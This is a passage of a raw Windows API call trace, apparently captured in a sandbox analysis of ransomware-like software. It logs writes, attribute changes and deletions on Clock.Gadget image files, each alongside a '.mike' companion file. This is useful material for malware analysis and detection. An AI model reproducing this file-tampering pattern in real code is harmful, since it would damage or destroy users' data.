lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png", lpFilePart=0x0) returned 0x58 [0103.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.470] WriteFile (in: hFile=0x288, lpBuffer=0x22fa71c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22fa71c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.471] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", lpFilePart=0x0) returned 0x5d [0103.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.474] WriteFile (in: hFile=0x288, lpBuffer=0x22ff7dc*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22ff7dc*, lpNumberOfBytesWritten=0x2af074*=0x2c0, lpOverlapped=0x0) returned 1 [0103.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.476] WriteFile (in: hFile=0x288, lpBuffer=0x2302a48*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2302a48*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", lpFilePart=0x0) returned 0x5d [0103.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.476] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", lpFilePart=0x0) returned 0x5d [0103.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png", dwFileAttributes=0x80) returned 0 [0103.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png", lpFilePart=0x0) returned 0x58 [0103.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", lpFilePart=0x0) returned 0x5d [0103.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike", lpFilePart=0x0) returned 0x5d [0103.479] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_disabled.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_disabled.png.mike")) returned 1 [0103.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", lpFilePart=0x0) returned 0x55 [0103.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.482] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", lpFilePart=0x0) returned 0x5a [0103.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", lpFilePart=0x0) returned 0x55 [0103.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", lpFilePart=0x0) returned 0x55 [0103.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.484] WriteFile (in: hFile=0x288, lpBuffer=0x2308038*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2308038*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.490] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", lpFilePart=0x0) returned 0x5a [0103.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.492] WriteFile (in: hFile=0x288, lpBuffer=0x210a350*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x210a350*, lpNumberOfBytesWritten=0x2af074*=0x420, lpOverlapped=0x0) returned 1 [0103.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.494] WriteFile (in: hFile=0x288, lpBuffer=0x210d5b0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x210d5b0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", lpFilePart=0x0) returned 0x5a [0103.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", lpFilePart=0x0) returned 0x5a [0103.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", dwFileAttributes=0x80) returned 0 [0103.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png", lpFilePart=0x0) returned 0x55 [0103.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", lpFilePart=0x0) returned 0x5a [0103.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike", lpFilePart=0x0) returned 0x5a [0103.497] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_hover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_hover.png.mike")) returned 1 [0103.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", lpFilePart=0x0) returned 0x57 [0103.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.502] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.502] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", lpFilePart=0x0) returned 0x5c [0103.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.503] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", lpFilePart=0x0) returned 0x57 [0103.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.504] WriteFile (in: hFile=0x288, lpBuffer=0x2112ba8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2112ba8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.505] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.508] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", lpFilePart=0x0) returned 0x5c [0103.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.508] WriteFile (in: hFile=0x288, lpBuffer=0x2118620*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2118620*, lpNumberOfBytesWritten=0x2af074*=0x460, lpOverlapped=0x0) returned 1 [0103.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.510] WriteFile (in: hFile=0x288, lpBuffer=0x211b888*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x211b888*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.510] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", lpFilePart=0x0) returned 0x5c [0103.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.511] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", lpFilePart=0x0) returned 0x5c [0103.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", dwFileAttributes=0x80) returned 0 [0103.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png", lpFilePart=0x0) returned 0x57 [0103.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", lpFilePart=0x0) returned 0x5c [0103.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0103.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0103.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike", lpFilePart=0x0) returned 0x5c [0103.513] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_right_pressed.png.mike")) returned 1 [0103.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", lpFilePart=0x0) returned 0x54 [0103.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0103.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0103.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0103.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0103.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0103.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0103.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", lpFilePart=0x0) returned 0x54 [0103.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.518] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.518] WriteFile (in: hFile=0x288, lpBuffer=0x2120e1c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2120e1c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.520] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.522] WriteFile (in: hFile=0x288, lpBuffer=0x2126278*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2126278*, lpNumberOfBytesWritten=0x2af074*=0x360, lpOverlapped=0x0) returned 1 [0103.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.523] WriteFile (in: hFile=0x288, lpBuffer=0x21294d4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21294d4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0103.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0103.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png.mike", lpFilePart=0x0) returned 0x59 [0103.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0103.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0103.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", dwFileAttributes=0x80) returned 0 [0103.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_right_rest.png", lpFilePart=0x0) returned 0x54 [0103.526] GetFullPathNameW (in: 